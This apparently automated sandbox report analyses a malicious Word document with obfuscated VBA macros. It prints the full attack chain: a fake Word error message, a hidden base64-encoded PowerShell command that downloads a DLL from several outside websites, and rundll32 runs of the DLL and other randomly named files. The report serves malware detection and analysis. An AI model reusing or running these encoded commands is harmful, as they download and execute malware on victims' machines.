DoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpnlsmsow\geunbjvu.dkg',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mjwjtkxgnh\wyssufqxr.vub',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iiasa\gdao.xuk',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kjucifzppxjqp\brxqhmcbxcls.kkx',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Chaxbancxgzy\rbmbxmqpfdk.tvd',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Umbfypagzceb\sgdrbhhkrdu.ucy',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pegimmebijdsrjpt\trbcflzgrjlwmib.jho',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqftsc\netes.ucb',Control_RunDLL
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpnlsmsow\geunbjvu.dkg',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mjwjtkxgnh\wyssufqxr.vub',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iiasa\gdao.xuk',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kjucifzppxjqp\brxqhmcbxcls.kkx',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Chaxbancxgzy\rbmbxmqpfdk.tvd',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Umbfypagzceb\sgdrbhhkrdu.ucy',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pegimmebijdsrjpt\trbcflzgrjlwmib.jho',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqftsc\netes.ucb',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                    Source: Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2107818605.0000000001E80000.00000002.00000001.sdmp
                    Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: DATA-480841.docInitial sample: OLE summary subject = lime payment B2B responsive Practical solid state copy compelling

                    Data Obfuscation:

                    barindex
                    Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                    Source: DATA-480841.docStream path 'Macros/VBA/Owppnp8hah4xo788' : High number of GOTO operations
                    Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Owppnp8hah4xo788
                    Obfuscated command line foundShow sources
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
                    PowerShell case anomaly foundShow sources
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAn